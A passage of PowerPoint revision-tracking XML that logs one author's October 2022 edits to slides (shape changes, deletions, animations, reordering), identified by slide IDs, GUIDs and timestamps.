          <pc:sldMk cId="2952303437" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:06:27.794" v="55" actId="14100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27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:05:48.554" v="45" actId="1076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27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:02:53.539" v="1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modSp mod modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:21:24.809" v="472"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="891638217" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:07:10.500" v="82" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="891638217" sldId="270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F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:08:45.344" v="166" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1260607813" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:08:45.344" v="166" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1260607813" sldId="277"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:21:31.848" v="473"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="80597609" sldId="298"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:07:46.396" v="147" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="80597609" sldId="298"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:15:48.945" v="339"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2236454765" sldId="299"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:21:47.930" v="477"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1190581667" sldId="301"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:21:10.379" v="471" actId="13926"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2873266326" sldId="302"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:21:10.379" v="471" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2873266326" sldId="302"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:22:14.072" v="478" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1738595862" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:22:14.072" v="478" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738595862" sldId="304"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:20:07.905" v="401"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3319556500" sldId="316"/>
        </pc:sldMkLst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7" creationId="{50AED3AE-A3CA-FCFB-0B2F-E642A328FB8B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:19:57.982" v="399" actId="13822"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:spMk id="8" creationId="{B7F093D2-038B-A23A-E8EB-701FDB0231EA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:19:55.761" v="398" actId="13822"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:spMk id="9" creationId="{FF4A78C0-7EFC-0445-E11E-15CA9C764E94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10" creationId="{41591102-5F02-C3D6-6E2E-9741AC66E255}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:10:14.485" v="169" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:spMk id="14" creationId="{5F60B1EA-774C-5E80-AE60-CF5A86F380EA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:11:33.437" v="247" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:spMk id="15" creationId="{C76C5D15-7EE1-141A-011E-5C8FD6F86B4C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17" creationId="{2B31238C-60C3-384F-8FC3-03CC0C253950}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:10:14.485" v="169" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:spMk id="19" creationId="{DE50556C-BF14-DA11-524C-FDC3043DAD03}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:10:03.648" v="168" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:spMk id="21" creationId="{04E8958F-D71C-DE10-1ED7-65865098DF2C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:12:04.385" v="307" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:spMk id="23" creationId="{4B1F7F7B-D85E-E22A-19AB-A3474154C539}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:17:52.579" v="344" actId="122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:spMk id="28" creationId="{26593B1B-0E56-2520-4862-3630A49923B1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:10:42.443" v="173" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:spMk id="30" creationId="{7F5627DF-8D22-7B3F-8946-EEC1178F6C5E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:10:03.648" v="168" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:picMk id="3" creationId="{26A57681-B464-C011-E3EA-6F3E2D025A56}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:10:03.648" v="168" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:picMk id="5" creationId="{26622AA9-236F-3C61-0B68-554958DC15E6}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:10:14.485" v="169" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:picMk id="11" creationId="{FDB381F5-0E7B-3154-3528-4A9B1A02AC18}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:10:14.485" v="169" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:picMk id="12" creationId="{A3343F79-1D78-33AB-EC5E-DFC83472F9A0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:10:03.648" v="168" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:cxnSpMk id="6" creationId="{F6A0EE37-507F-6230-B80B-B8C294DB5596}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:10:14.485" v="169" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:cxnSpMk id="13" creationId="{EE41070B-0486-8CD9-258B-40DF49EF044D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:10:14.485" v="169" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319556500" sldId="316"/>
            <ac:cxnSpMk id="16" creationId="{7C0F99DF-9798-02C1-216F-62F644C86D16}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd delSection modSection">
      <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:25:16.375" v="4070" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:33:42.934" v="651" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3215868461" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:31:57.119" v="426" actId="14100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27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:33:42.934" v="651" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3215868461" sldId="265"/>
            <ac:spMk id="8" creationId="{9D4B3052-5260-DCF3-1582-98BFB20C42E6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:26:43.011" v="27" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="891638217" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:26:43.011" v="27" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="891638217" sldId="270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8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:33:48.586" v="653" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1260607813" sldId="277"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:33:46.951" v="652" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3328257088" sldId="278"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:36:54.188" v="731" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1539343521" sldId="290"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:36:54.188" v="731" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2048451075" sldId="291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1311166935" sldId="292"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod ord">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:45:27.459" v="1046" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1430027698" sldId="293"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:36:43.059" v="730" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1430027698" sldId="293"/>
            <ac:spMk id="4" creationId="{0C9609F8-F29B-B7B4-D48D-3D146F22750B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:36:32.908" v="700" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1430027698" sldId="293"/>
            <ac:spMk id="6" creationId="{021DB960-2713-C71C-53BF-43DC1D9718AC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:45:27.459" v="1046" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1430027698" sldId="293"/>
            <ac:spMk id="8" creationId="{9D4B3052-5260-DCF3-1582-98BFB20C42E6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:45:07.944" v="971" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1771928653" sldId="294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3901228743" sldId="295"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod ord modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:06:27.493" v="2445" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3382763336" sldId="296"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:06:27.493" v="2445" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3382763336" sldId="296"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:50:21.248" v="1402" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3875275752" sldId="297"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:45:38.912" v="1089" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:02.457" v="1090" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:04.407" v="1091" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="6" creationId="{FBF623AA-88AD-0708-ED45-09A29A917D91}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod topLvl">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:50.893" v="1114" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="11" creationId="{5D154DA5-B1F6-0A92-BCD3-EDD60EF90B6E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod topLvl">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:34.485" v="1101" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="12" creationId="{BFFB4200-7D09-96A7-144D-37A8CC97BC73}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod topLvl">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:30.054" v="1098" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="14" creationId="{9821EEB5-40EA-6193-6776-92BED710ACF5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod topLvl">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:33.143" v="1100" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="15" creationId="{0BEBE50F-6DD7-3525-8653-B89232DA8323}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod topLvl">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:30.054" v="1098" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="16" creationId="{0EC5CDB3-C087-B1D6-D60A-CEDAF7ADDDD4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod topLvl">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:30.054" v="1098" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="17" creationId="{4627CC09-18DA-F04D-25CD-F5C85362C0E8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod topLvl">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:31.544" v="1099" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="18" creationId="{02346B44-B5A3-3D73-4709-9D50817B9451}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:57.808" v="1120" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="20" creationId="{A4FE9782-F360-FFA9-3339-9481E3D7471A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:47:26.673" v="1144" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="22" creationId="{BDF7DEFA-489F-BE82-51BF-2D8A0BAE1509}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
